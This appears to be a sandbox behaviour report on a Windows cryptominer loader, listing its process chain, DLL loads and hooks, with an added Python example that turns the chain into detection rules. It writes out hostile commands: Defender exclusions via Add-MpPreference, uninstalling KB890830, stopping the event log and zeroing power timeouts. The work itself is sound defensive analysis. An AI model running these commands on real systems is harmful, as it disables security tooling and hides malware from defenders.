Source: C:\Users\user\Desktop\loader.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "NUTGFFPE"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe | Process created: C:\Windows\System32\dialer.exe dialer.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
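The process chain above is the part of this report a detection engineer turns into rules: a Defender exclusion for the whole user profile, ProgramData and every .exe via Add-MpPreference; removal of the Malicious Software Removal Tool (KB890830) with wusa /uninstall; every powercfg sleep and hibernate timeout set to 0 so the miner is never suspended; sc stop eventlog before the service is installed; an auto-start service whose binary lives under C:\ProgramData; and dialer.exe, a signed Windows binary, started by a user-profile executable and then hosting the XMRig payload. The same chain is replayed by the dropped service binary, so the rules fire twice. What follows is an added example, not part of the Joe Sandbox report and not code from the sample: command-line rules for those six behaviours, run over a constructed list of process-creation events shaped after the lines above (with the harmless sc delete and sc start calls and an ordinary powercfg /hibernate off as controls), plus a triage step that alerts once three distinct techniques fire. The event fields, the rule names and the threshold are assumptions for the example; in production the events would come from Sysmon event 1 or Security event 4688 with command-line auditing enabled.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # image path of the creating process
    image: str    # image path of the created process
    cmdline: str  # full command line as logged


def _cmd(pattern):
    """Rule helper: case-insensitive regex over the command line."""
    return lambda e: re.search(pattern, e.cmdline, re.I) is not None


# One rule per technique seen in the chain. Names are assumptions for this example,
# not Joe Sandbox or Sigma rule names.
RULES = [
    # Add-MpPreference with any exclusion switch; the sample excludes %UserProfile%,
    # %ProgramData% and all .exe files, which blinds Defender to the dropped service binary.
    ("defender_exclusion",
     _cmd(r"add-mppreference.*-exclusion(path|extension|process)")),
    # KB890830 is the Malicious Software Removal Tool; uninstalling it is pure defence evasion.
    ("msrt_removed",
     _cmd(r"\bwusa(\.exe)?\s+/uninstall\s+/kb:890830\b")),
    # Standby/hibernate timeouts forced to 0 (never) on AC or battery.
    ("power_timeouts_zeroed",
     _cmd(r"\bpowercfg(\.exe)?\s+/x\s+-(standby|hibernate)-timeout-(ac|dc)\s+0\b")),
    # Attempt to stop the EventLog service, i.e. to suppress the 7045 service-install record.
    ("eventlog_stopped",
     _cmd(r"\bsc(\.exe)?\s+stop\s+eventlog\b")),
    # Service binary under ProgramData rather than Program Files or System32.
    ("service_from_programdata",
     _cmd(r"\bsc(\.exe)?\s+create\b.*\bbinpath=\s*\"?[a-z]:\\programdata\\")),
    # dialer.exe launched by something outside C:\Windows: in this report it is the
    # hollowing host for the miner, and it has no legitimate reason to be spawned this way.
    ("dialer_spawned_by_user_process",
     lambda e: e.image.lower().endswith("\\dialer.exe")
     and not e.parent.lower().startswith("c:\\windows\\")),
]


def detect(events):
    """Return (rule name, event) for every event that matches a rule."""
    return [(name, e) for e in events for name, pred in RULES if pred(e)]


def triage(events, threshold=3):
    """Distinct rules that fired and whether they reach the alert threshold."""
    fired = sorted({name for name, _ in detect(events)})
    return fired, len(fired) >= threshold


LOADER = r"C:\Users\user\Desktop\loader.exe"
SYS32 = r"C:\Windows\System32"

# Constructed sample events mirroring the report's process tree (not a real log export).
SAMPLE_EVENTS = [
    ProcEvent(LOADER, SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force"),
    ProcEvent(LOADER, SYS32 + r"\cmd.exe",
              r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart"),
    ProcEvent(LOADER, SYS32 + r"\powercfg.exe",
              r"C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0"),
    ProcEvent(LOADER, SYS32 + r"\dialer.exe", r"C:\Windows\system32\dialer.exe"),
    ProcEvent(LOADER, SYS32 + r"\sc.exe", r'C:\Windows\system32\sc.exe delete "NUTGFFPE"'),
    ProcEvent(LOADER, SYS32 + r"\sc.exe",
              r'C:\Windows\system32\sc.exe create "NUTGFFPE" binpath= "C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe" start= "auto"'),
    ProcEvent(LOADER, SYS32 + r"\sc.exe", r"C:\Windows\system32\sc.exe stop eventlog"),
    ProcEvent(LOADER, SYS32 + r"\sc.exe", r'C:\Windows\system32\sc.exe start "NUTGFFPE"'),
    # benign control: an administrator turning hibernation off from a console
    ProcEvent(SYS32 + r"\cmd.exe", SYS32 + r"\powercfg.exe",
              r"C:\Windows\system32\powercfg.exe /hibernate off"),
]

if __name__ == "__main__":
    for name, e in detect(SAMPLE_EVENTS):
        print(f"{name:32s} {e.cmdline}")
    print(triage(SAMPLE_EVENTS))
```

Each rule on its own is noisy in some environments (power settings are changed by imaging scripts, exclusions by software installers), which is why the triage step keys on the number of distinct techniques from one parent rather than on any single command; the chain in this report trips all six.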
        Source: C:\Users\user\Desktop\loader.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\powercfg.exe Section loaded: umpdc.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: ntmarta.dll
        Source: C:\Windows\System32\wusa.exe Section loaded: dpx.dll
        Source: C:\Windows\System32\wusa.exe Section loaded: wtsapi32.dll
        Source: C:\Windows\System32\wusa.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\wusa.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wusa.exe Section loaded: uxtheme.dll
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe Section loaded: apphelp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: powrprof.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: umpdc.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: mswsock.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: dnsapi.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: napinsp.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: pnrpnsp.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: wshbth.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: nlaapi.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: winrnr.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\dialer.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\dialer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: loader.exe Static PE information: Image base 0x140000000 > 0x60000000
        Source: loader.exe Static file information: File size 5502728 > 1048576
        Source: loader.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x52e200
        Source: loader.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: wepulfrfkvoz.exe, 00000019.00000003.1877581425.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp
        Source: loader.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: loader.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: loader.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: loader.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: loader.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
        Source: C:\Windows\System32\dialer.exe Code function: 43_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 43_2_00000001408460F0
        Source: loader.exe Static PE information: section name: .00cfg
        Source: wepulfrfkvoz.exe.0.dr Static PE information: section name: .00cfg
        Source: C:\Windows\System32\winlogon.exe Code function: 20_2_00000225DC62ACDD push rcx; retf 003Fh 20_2_00000225DC62ACDE
        Source: C:\Windows\System32\winlogon.exe Code function: 20_2_00000225DC65C6DD push rcx; retf 003Fh 20_2_00000225DC65C6DE
        Source: C:\Windows\System32\winlogon.exe Code function: 20_2_00000225DC68ACDD push rcx; retf 003Fh 20_2_00000225DC68ACDE
        Source: C:\Windows\System32\winlogon.exe Code function: 20_2_00000225DC6BC6DD push rcx; retf 003Fh 20_2_00000225DC6BC6DE
        Source: C:\Windows\System32\lsass.exe Code function: 26_2_00000202C0ACACDD push rcx; retf 003Fh 26_2_00000202C0ACACDE
        Source: C:\Windows\System32\lsass.exe Code function: 26_2_00000202C0AFC6DD push rcx; retf 003Fh 26_2_00000202C0AFC6DE
        Source: C:\Windows\System32\svchost.exe Code function: 29_2_000002A6612EACDD push rcx; retf 003Fh 29_2_000002A6612EACDE
        Source: C:\Windows\System32\svchost.exe Code function: 29_2_000002A66131C6DD push rcx; retf 003Fh 29_2_000002A66131C6DE
        Source: C:\Windows\System32\dwm.exe Code function: 30_2_000002BAAEDDACDD push rcx; retf 003Fh 30_2_000002BAAEDDACDE
        Source: C:\Windows\System32\dwm.exe Code function: 30_2_000002BAAEE0C6DD push rcx; retf 003Fh 30_2_000002BAAEE0C6DE
        Source: C:\Windows\System32\dialer.exe Code function: 42_2_0000000140001394 push qword ptr [0000000140009004h]; ret 42_2_0000000140001403
        Source: C:\Windows\System32\svchost.exe Code function: 45_2_0000026A879AACDD push rcx; retf 003Fh 45_2_0000026A879AACDE
        Source: C:\Windows\System32\svchost.exe Code function: 46_2_000001795378ACDD push rcx; retf 003Fh 46_2_000001795378ACDE
        Source: C:\Windows\System32\svchost.exe Code function: 46_2_00000179537BC6DD push rcx; retf 003Fh 46_2_00000179537BC6DE
        Source: C:\Windows\System32\svchost.exe Code function: 47_2_000002295D54ACDD push rcx; retf 003Fh 47_2_000002295D54ACDE
        Source: C:\Windows\System32\svchost.exe Code function: 47_2_000002295D57C6DD push rcx; retf 003Fh 47_2_000002295D57C6DE
        Source: C:\Windows\System32\svchost.exe Code function: 50_2_00000253067EACDD push rcx; retf 003Fh 50_2_00000253067EACDE
        Source: C:\Windows\System32\svchost.exe Code function: 50_2_0000025306E7C6DD push rcx; retf 003Fh 50_2_0000025306E7C6DE
        Source: C:\Windows\System32\svchost.exe Code function: 51_2_000001845B3DC6DD push rcx; retf 003Fh 51_2_000001845B3DC6DE
        Source: C:\Windows\System32\svchost.exe Code function: 53_2_000001ADECD5C6DD push rcx; retf 003Fh 53_2_000001ADECD5C6DE
        Source: C:\Windows\System32\svchost.exe Code function: 54_2_000001D55905ACDD push rcx; retf 003Fh 54_2_000001D55905ACDE
        Source: C:\Windows\System32\svchost.exe Code function: 54_2_000001D55908C6DD push rcx; retf 003Fh 54_2_000001D55908C6DE
        Source: C:\Windows\System32\svchost.exe Code function: 55_2_00000241A9EBC6DD push rcx; retf 003Fh 55_2_00000241A9EBC6DE
        Source: C:\Windows\System32\svchost.exe Code function: 56_2_000001CD7317ACDD push rcx; retf 003Fh 56_2_000001CD7317ACDE
        Source: C:\Windows\System32\svchost.exe Code function: 56_2_000001CD731AC6DD push rcx; retf 003Fh 56_2_000001CD731AC6DE
        Source: C:\Windows\System32\svchost.exe Code function: 57_2_000002824E87ACDD push rcx; retf 003Fh 57_2_000002824E87ACDE
        Source: C:\Windows\System32\svchost.exe Code function: 57_2_000002824E8AC6DD push rcx; retf 003Fh 57_2_000002824E8AC6DE
        Source: C:\Windows\System32\svchost.exe Code function: 58_2_0000021B473DACDD push rcx; retf 003Fh 58_2_0000021B473DACDE
        Source: C:\Windows\System32\svchost.exe Code function: 58_2_0000021B47B4C6DD push rcx; retf 003Fh 58_2_0000021B47B4C6DE

        Persistence and Installation Behavior

        Source: C:\Windows\System32\lsass.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe File created: C:\Windows\TEMP\gyqerfjfsbie.sys
        Source: C:\Users\user\Desktop\loader.exe File created: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe File created: C:\Windows\Temp\gyqerfjfsbie.sys
        Source: C:\Users\user\Desktop\loader.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "NUTGFFPE"

        Hooking and other Techniques for Hiding and Protection

        Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
        Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
        Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: explorer.exe User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
        Source: C:\Windows\System32\lsass.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
